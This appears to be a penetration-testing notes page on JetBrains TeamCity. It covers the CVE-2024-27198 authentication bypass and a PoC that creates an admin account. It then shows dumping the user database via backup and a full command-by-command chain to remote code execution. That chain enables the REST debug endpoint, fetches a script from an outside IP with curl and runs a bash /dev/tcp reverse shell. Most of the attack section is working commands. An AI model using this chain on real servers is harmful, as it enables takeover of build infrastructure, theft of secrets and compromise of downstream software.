TeamCity
TeamCity is a web-based Continuous Integration and Continuous Deployment (CI/CD) platform developed by JetBrains. It is commonly used in software development pipelines to automate code testing, building, and deployment. The application exposes a web interface that allows developers and DevOps teams to configure build processes, monitor execution, manage user permissions, and integrate with version control systems such as Git, Mercurial, and Subversion. It supports custom build steps, agent-based job execution, and plugin extensions, making it highly flexible but also potentially risky when exposed to the internet. Since it often manages access tokens, deployment secrets, and code execution contexts, any compromise of a TeamCity instance can result in full control over source code repositories, build artifacts, and downstream infrastructure.
Authentication Bypass
JetBrains TeamCity On-Premises instances prior to version 2023.11.4 are affected by an authentication bypass vulnerability (CVE-2024-27198) which allows unauthenticated attackers to perform administrative actions.
The flaw arises from improper access control checks in the web interface, which let crafted requests reach admin-level endpoints without valid credentials. Exploiting it yields full administrative access to the TeamCity server: reading or modifying project configurations, injecting malicious build steps, accessing build logs and secrets, or triggering arbitrary code execution via the build agents.
A working PoC which creates an admin account is available:
python3 CVE-2024-27198.py -t http://tc-instance -u x7331 -p Password123!
With that account the UI is accessible and the application's database can be dumped as follows:
Administration → Backup
Start backup with All except build artifacts scope
Download the resulting ZIP file, extract it and read the user table:
$ cat database_dump/users
RCE
Several public PoCs build on the above vulnerability to achieve RCE through the REST debug endpoint. For this to work, debug mode must be enabled on the server (the rest.debug.processes.enable internal property), which requires an admin user; create one with any of the PoCs mentioned.
# Create an admin user
$ uv run exploit.py -u http://tc-instance --add-user
[+] User created successfully. Username: xbxb4t78, ID: 22, Password: mEwy3Dn5Ic
[+] Token created successfully for user ID: 22. Token Name: dWzcfCVd61, Token: ey...Fj
# If the PoC reports that the token already exists, delete the stale one and re-run the token step
$ curl -X DELETE http://tc-instance/app/rest/users/id:22/tokens/RPC2
# Save the token
$ export TOKEN="ey...Fj"
# Enable debug mode by writing the property into config/internal.properties
$ curl -X POST 'http://tc-instance/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"
# Request the diagnostics page so the server re-reads internal.properties and the property takes effect
$ curl 'http://tc-instance/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties' -H "Authorization: Bearer $TOKEN"
RCE can now be achieved manually or by using the PoCs. The endpoint takes the binary in exePath and every argument as a separate params= query key:
# Check whether curl is available on the server
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=which&params=curl' -H "Authorization: Bearer $TOKEN"
# revshell.sh → bash -i >& /dev/tcp/192.168.45.170/80 0>&1
# Download the file (saved relative to the working directory of the TeamCity server process)
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=curl&params=192.168.45.170:443/revshell.sh&params=-o&params=revshell.sh' -H "Authorization: Bearer $TOKEN"
# Execute the file with bash from that same working directory
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=bash&params=revshell.sh' -H "Authorization: Bearer $TOKEN"